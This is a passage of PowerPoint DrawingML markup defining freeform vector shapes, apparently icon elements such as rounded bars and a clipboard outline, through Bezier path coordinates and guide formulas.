                <a:gd name="T10" fmla="*/ 783 w 783"/>
                <a:gd name="T11" fmla="*/ 26 h 53"/>
                <a:gd name="T12" fmla="*/ 757 w 783"/>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83" h="53">
                  <a:moveTo>
                    <a:pt x="757" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="53"/>
                    <a:pt x="26" y="53"/>
                    <a:pt x="26" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="53"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="772" y="0"/>
                    <a:pt x="783" y="12"/>
                    <a:pt x="783" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="783" y="41"/>
                    <a:pt x="772" y="53"/>
                    <a:pt x="757"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91" name="Freeform 1030">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDA39DA-65E7-5648-AA8C-D503728F8B25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4778985"/>
              <a:ext cx="59505" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 120 w 146"/>
                <a:gd name="T1" fmla="*/ 52 h 52"/>
                <a:gd name="T2" fmla="*/ 26 w 146"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 146"/>
                <a:gd name="T5" fmla="*/ 26 h 52"/>
                <a:gd name="T6" fmla="*/ 26 w 146"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 120 w 146"/>
                <a:gd name="T9" fmla="*/ 0 h 52"/>
                <a:gd name="T10" fmla="*/ 146 w 146"/>
                <a:gd name="T11" fmla="*/ 26 h 52"/>
                <a:gd name="T12" fmla="*/ 120 w 146"/>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46" h="52">
                  <a:moveTo>
                    <a:pt x="120" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="52"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="0"/>
                    <a:pt x="120" y="0"/>
                    <a:pt x="120" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="0"/>
                    <a:pt x="146" y="12"/>
                    <a:pt x="146" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="41"/>
                    <a:pt x="134" y="52"/>
                    <a:pt x="120"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92" name="Freeform 1031">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF6E5ABE-93E8-9E47-8F67-0AB721B84E42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4663190"/>
              <a:ext cx="49856" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 123"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 26 w 123"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 123"/>
                <a:gd name="T5" fmla="*/ 27 h 53"/>
                <a:gd name="T6" fmla="*/ 26 w 123"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 96 w 123"/>
                <a:gd name="T9" fmla="*/ 0 h 53"/>
                <a:gd name="T10" fmla="*/ 123 w 123"/>
                <a:gd name="T11" fmla="*/ 27 h 53"/>
                <a:gd name="T12" fmla="*/ 96 w 123"/>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3" h="53">
                  <a:moveTo>
                    <a:pt x="96" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="53"/>
                    <a:pt x="26" y="53"/>
                    <a:pt x="26" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="53"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="0"/>
                    <a:pt x="96" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="0"/>
                    <a:pt x="123" y="12"/>
                    <a:pt x="123" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="41"/>
                    <a:pt x="111" y="53"/>
                    <a:pt x="9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93" name="Freeform 1032">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2F17D8-160F-3543-B9E1-F7B0FD08E921}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4721088"/>
              <a:ext cx="45031" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 86 w 112"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 26 w 112"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 112"/>
                <a:gd name="T5" fmla="*/ 26 h 53"/>
                <a:gd name="T6" fmla="*/ 26 w 112"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 86 w 112"/>
                <a:gd name="T9" fmla="*/ 0 h 53"/>
                <a:gd name="T10" fmla="*/ 112 w 112"/>
                <a:gd name="T11" fmla="*/ 26 h 53"/>
                <a:gd name="T12" fmla="*/ 86 w 11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12" h="53">
                  <a:moveTo>
                    <a:pt x="86" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="53"/>
                    <a:pt x="26" y="53"/>
                    <a:pt x="26" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="53"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="86" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="0"/>
                    <a:pt x="112" y="12"/>
                    <a:pt x="112" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="41"/>
                    <a:pt x="101" y="53"/>
                    <a:pt x="86"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94" name="Freeform 1033">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F6091CA-5C56-1E49-B566-CD581291DC32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4605294"/>
              <a:ext cx="59505" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 148"/>
                <a:gd name="T1" fmla="*/ 52 h 52"/>
                <a:gd name="T2" fmla="*/ 26 w 148"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 148"/>
                <a:gd name="T5" fmla="*/ 26 h 52"/>
                <a:gd name="T6" fmla="*/ 26 w 148"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 122 w 148"/>
                <a:gd name="T9" fmla="*/ 0 h 52"/>
                <a:gd name="T10" fmla="*/ 148 w 148"/>
                <a:gd name="T11" fmla="*/ 26 h 52"/>
                <a:gd name="T12" fmla="*/ 122 w 148"/>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148" h="52">
                  <a:moveTo>
                    <a:pt x="122" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="52"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="0"/>
                    <a:pt x="122" y="0"/>
                    <a:pt x="122" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="0"/>
                    <a:pt x="148" y="12"/>
                    <a:pt x="148" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="41"/>
                    <a:pt x="136" y="52"/>
                    <a:pt x="122"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95" name="Freeform 1034">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC8EEEE-B760-0B4A-8DF8-A071EBBD7C1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4545790"/>
              <a:ext cx="119010" cy="22515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 271 w 299"/>
                <a:gd name="T1" fmla="*/ 57 h 57"/>
                <a:gd name="T2" fmla="*/ 28 w 299"/>
                <a:gd name="T3" fmla="*/ 57 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 299"/>
                <a:gd name="T5" fmla="*/ 28 h 57"/>
                <a:gd name="T6" fmla="*/ 28 w 299"/>
                <a:gd name="T7" fmla="*/ 0 h 57"/>
                <a:gd name="T8" fmla="*/ 271 w 299"/>
                <a:gd name="T9" fmla="*/ 0 h 57"/>
                <a:gd name="T10" fmla="*/ 299 w 299"/>
                <a:gd name="T11" fmla="*/ 28 h 57"/>
                <a:gd name="T12" fmla="*/ 271 w 299"/>
                <a:gd name="T13" fmla="*/ 57 h 57"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="299" h="57">
                  <a:moveTo>
                    <a:pt x="271" y="57"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="57"/>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="13"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="28" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="0"/>
                    <a:pt x="271" y="0"/>
                    <a:pt x="271" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="0"/>
                    <a:pt x="299" y="13"/>
                    <a:pt x="299" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299" y="44"/>
                    <a:pt x="286" y="57"/>
                    <a:pt x="27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96" name="Freeform 1035">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D48CA32-F897-484B-9952-B01ACB1B11BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4489500"/>
              <a:ext cx="311999" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 757 w 783"/>
                <a:gd name="T1" fmla="*/ 52 h 52"/>
                <a:gd name="T2" fmla="*/ 26 w 783"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 783"/>
                <a:gd name="T5" fmla="*/ 26 h 52"/>
                <a:gd name="T6" fmla="*/ 26 w 783"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 757 w 783"/>
                <a:gd name="T9" fmla="*/ 0 h 52"/>
                <a:gd name="T10" fmla="*/ 783 w 783"/>
                <a:gd name="T11" fmla="*/ 26 h 52"/>
                <a:gd name="T12" fmla="*/ 757 w 78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783" h="52">
                  <a:moveTo>
                    <a:pt x="757" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="52"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="772" y="0"/>
                    <a:pt x="783" y="11"/>
                    <a:pt x="783" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="783" y="40"/>
                    <a:pt x="772" y="52"/>
                    <a:pt x="757"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97" name="Freeform 1036">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{232EFE25-CBA0-2141-869D-4F0A56B8E00F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10228824" y="4365665"/>
              <a:ext cx="509814" cy="644906"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1165 w 1281"/>
                <a:gd name="T1" fmla="*/ 1624 h 1624"/>
                <a:gd name="T2" fmla="*/ 119 w 1281"/>
                <a:gd name="T3" fmla="*/ 1624 h 1624"/>
                <a:gd name="T4" fmla="*/ 0 w 1281"/>
                <a:gd name="T5" fmla="*/ 1509 h 1624"/>
                <a:gd name="T6" fmla="*/ 0 w 1281"/>
                <a:gd name="T7" fmla="*/ 119 h 1624"/>
                <a:gd name="T8" fmla="*/ 119 w 1281"/>
                <a:gd name="T9" fmla="*/ 0 h 1624"/>
                <a:gd name="T10" fmla="*/ 424 w 1281"/>
                <a:gd name="T11" fmla="*/ 0 h 1624"/>
                <a:gd name="T12" fmla="*/ 449 w 1281"/>
                <a:gd name="T13" fmla="*/ 25 h 1624"/>
                <a:gd name="T14" fmla="*/ 449 w 1281"/>
                <a:gd name="T15" fmla="*/ 90 h 1624"/>
                <a:gd name="T16" fmla="*/ 828 w 1281"/>
                <a:gd name="T17" fmla="*/ 90 h 1624"/>
                <a:gd name="T18" fmla="*/ 828 w 1281"/>
                <a:gd name="T19" fmla="*/ 25 h 1624"/>
                <a:gd name="T20" fmla="*/ 853 w 1281"/>
                <a:gd name="T21" fmla="*/ 0 h 1624"/>
                <a:gd name="T22" fmla="*/ 1165 w 1281"/>
                <a:gd name="T23" fmla="*/ 0 h 1624"/>
                <a:gd name="T24" fmla="*/ 1281 w 1281"/>
                <a:gd name="T25" fmla="*/ 119 h 1624"/>
                <a:gd name="T26" fmla="*/ 1281 w 1281"/>
                <a:gd name="T27" fmla="*/ 1119 h 1624"/>
                <a:gd name="T28" fmla="*/ 1255 w 1281"/>
                <a:gd name="T29" fmla="*/ 1144 h 1624"/>
                <a:gd name="T30" fmla="*/ 1230 w 1281"/>
                <a:gd name="T31" fmla="*/ 1119 h 1624"/>
                <a:gd name="T32" fmla="*/ 1230 w 1281"/>
                <a:gd name="T33" fmla="*/ 119 h 1624"/>
                <a:gd name="T34" fmla="*/ 1165 w 1281"/>
                <a:gd name="T35" fmla="*/ 51 h 1624"/>
                <a:gd name="T36" fmla="*/ 878 w 1281"/>
                <a:gd name="T37" fmla="*/ 51 h 1624"/>
                <a:gd name="T38" fmla="*/ 878 w 1281"/>
                <a:gd name="T39" fmla="*/ 115 h 1624"/>
                <a:gd name="T40" fmla="*/ 853 w 1281"/>
                <a:gd name="T41" fmla="*/ 140 h 1624"/>
                <a:gd name="T42" fmla="*/ 424 w 1281"/>
                <a:gd name="T43" fmla="*/ 140 h 1624"/>
                <a:gd name="T44" fmla="*/ 398 w 1281"/>
                <a:gd name="T45" fmla="*/ 115 h 1624"/>
                <a:gd name="T46" fmla="*/ 398 w 1281"/>
                <a:gd name="T47" fmla="*/ 51 h 1624"/>
                <a:gd name="T48" fmla="*/ 119 w 1281"/>
                <a:gd name="T49" fmla="*/ 51 h 1624"/>
                <a:gd name="T50" fmla="*/ 50 w 1281"/>
                <a:gd name="T51" fmla="*/ 119 h 1624"/>
                <a:gd name="T52" fmla="*/ 50 w 1281"/>
                <a:gd name="T53" fmla="*/ 1509 h 1624"/>
                <a:gd name="T54" fmla="*/ 119 w 1281"/>
                <a:gd name="T55" fmla="*/ 1574 h 1624"/>
                <a:gd name="T56" fmla="*/ 1165 w 1281"/>
                <a:gd name="T57" fmla="*/ 1574 h 1624"/>
                <a:gd name="T58" fmla="*/ 1230 w 1281"/>
                <a:gd name="T59" fmla="*/ 1509 h 1624"/>
                <a:gd name="T60" fmla="*/ 1255 w 1281"/>
                <a:gd name="T61" fmla="*/ 1484 h 1624"/>
                <a:gd name="T62" fmla="*/ 1281 w 1281"/>
                <a:gd name="T63" fmla="*/ 1509 h 1624"/>
                <a:gd name="T64" fmla="*/ 1165 w 1281"/>
                <a:gd name="T65" fmla="*/ 1624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1" h="1624">
                  <a:moveTo>
                    <a:pt x="1165" y="1624"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="1624"/>
                    <a:pt x="119" y="1624"/>
                    <a:pt x="119" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="1624"/>
                    <a:pt x="0" y="1573"/>
                    <a:pt x="0" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="119"/>
                    <a:pt x="0" y="119"/>
                    <a:pt x="0" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55"/>
                    <a:pt x="54" y="0"/>
                    <a:pt x="119" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="0"/>
                    <a:pt x="424" y="0"/>
                    <a:pt x="424" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="0"/>
                    <a:pt x="449" y="11"/>
                    <a:pt x="449" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="90"/>
                    <a:pt x="449" y="90"/>
                    <a:pt x="449" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="90"/>
                    <a:pt x="828" y="90"/>
                    <a:pt x="828" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="25"/>
                    <a:pt x="828" y="25"/>
                    <a:pt x="828" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="11"/>
                    <a:pt x="839" y="0"/>
                    <a:pt x="853" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1165" y="0"/>
                    <a:pt x="1165" y="0"/>
                    <a:pt x="1165" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="0"/>
                    <a:pt x="1281" y="53"/>
                    <a:pt x="1281" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="1119"/>
                    <a:pt x="1281" y="1119"/>
                    <a:pt x="1281" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="1133"/>
                    <a:pt x="1269" y="1144"/>
                    <a:pt x="1255" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1241" y="1144"/>
                    <a:pt x="1230" y="1133"/>
                    <a:pt x="1230" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1230" y="119"/>
                    <a:pt x="1230" y="119"/>
                    <a:pt x="1230" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1230" y="81"/>
                    <a:pt x="1201" y="51"/>
                    <a:pt x="1165" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="51"/>
                    <a:pt x="878" y="51"/>
                    <a:pt x="878" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="115"/>
                    <a:pt x="878" y="115"/>
                    <a:pt x="878" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="129"/>
                    <a:pt x="867" y="140"/>
                    <a:pt x="853" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="140"/>
                    <a:pt x="424" y="140"/>
                    <a:pt x="424" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="140"/>
                    <a:pt x="398" y="129"/>
                    <a:pt x="398" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="51"/>
                    <a:pt x="398" y="51"/>
                    <a:pt x="398" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="51"/>
                    <a:pt x="119" y="51"/>
                    <a:pt x="119" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="51"/>
                    <a:pt x="50" y="82"/>
                    <a:pt x="50" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1509"/>
                    <a:pt x="50" y="1509"/>
                    <a:pt x="50" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1545"/>
                    <a:pt x="81" y="1574"/>
                    <a:pt x="119" y="1574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1165" y="1574"/>
                    <a:pt x="1165" y="1574"/>
                    <a:pt x="1165" y="1574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="1574"/>
                    <a:pt x="1230" y="1546"/>
                    <a:pt x="1230" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1230" y="1495"/>
                    <a:pt x="1241" y="1484"/>
                    <a:pt x="1255" y="1484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1269" y="1484"/>
                    <a:pt x="1281" y="1495"/>
                    <a:pt x="1281" y="1509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="1574"/>
                    <a:pt x="1230" y="1624"/>
                    <a:pt x="1165" y="16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98" name="Freeform 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCCFEA27-D85B-2A4A-A3B8-9F19175EFD49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10719337" y="4798283"/>
              <a:ext cx="19299" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 51"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 7 w 51"/>
                <a:gd name="T3" fmla="*/ 46 h 53"/>
                <a:gd name="T4" fmla="*/ 2 w 51"/>
                <a:gd name="T5" fmla="*/ 38 h 53"/>
                <a:gd name="T6" fmla="*/ 0 w 51"/>
                <a:gd name="T7" fmla="*/ 28 h 53"/>
                <a:gd name="T8" fmla="*/ 7 w 51"/>
                <a:gd name="T9" fmla="*/ 10 h 53"/>
                <a:gd name="T10" fmla="*/ 43 w 51"/>
                <a:gd name="T11" fmla="*/ 10 h 53"/>
                <a:gd name="T12" fmla="*/ 51 w 51"/>
                <a:gd name="T13" fmla="*/ 28 h 53"/>
                <a:gd name="T14" fmla="*/ 49 w 51"/>
                <a:gd name="T15" fmla="*/ 38 h 53"/>
                <a:gd name="T16" fmla="*/ 43 w 51"/>
                <a:gd name="T17" fmla="*/ 46 h 53"/>
                <a:gd name="T18" fmla="*/ 35 w 51"/>
                <a:gd name="T19" fmla="*/ 51 h 53"/>
                <a:gd name="T20" fmla="*/ 25 w 51"/>
                <a:gd name="T21"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3">
                  <a:moveTo>
                    <a:pt x="25" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="53"/>
                    <a:pt x="12" y="50"/>
                    <a:pt x="7" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="43"/>
                    <a:pt x="3" y="41"/>
                    <a:pt x="2" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="34"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="3" y="15"/>
                    <a:pt x="7" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="43" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="15"/>
                    <a:pt x="51" y="21"/>
                    <a:pt x="51" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="31"/>
                    <a:pt x="50" y="34"/>
                    <a:pt x="49" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="41"/>
                    <a:pt x="46" y="43"/>
                    <a:pt x="43" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="48"/>
                    <a:pt x="38" y="50"/>
